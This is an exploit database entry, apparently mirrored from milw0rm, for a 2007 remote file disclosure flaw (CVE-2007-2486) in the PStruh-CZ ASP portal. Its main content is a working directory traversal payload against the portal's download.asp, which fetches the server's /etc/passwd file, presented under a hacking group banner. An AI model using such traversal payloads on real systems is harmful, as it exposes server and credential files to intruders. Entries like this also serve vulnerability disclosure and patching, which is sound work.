PStruh-CZ 1.3/1.5 - 'download.asp' File Disclosure
Author: Dj7xpl
type: webapps
platform: asp
port:
date_added: 2007-05-01
date_updated:
verified: 1
codes: OSVDB-38458;CVE-2007-2486
tags:
aliases:
screenshot_url:
application_url:
/*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
|* *|
|* Y! Underground Group *|
|* *|
\*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/
/*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
Portal.....: PStruh-CZ 1.3&1.5
Type.......: Remote File Disclosure Vulnerability
Author.....: Dj7xpl / dj7xpl@2600.ir
HomePage...: http://Dj7xpl.2600.ir
\*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/
/*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*\
Bug........:
download.asp?File=[File Path]&PT=[PostFix]
download.asp?File=../../../../etc/passwd&pt=zip
\*-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-*/
# milw0rm.com [2007-05-02]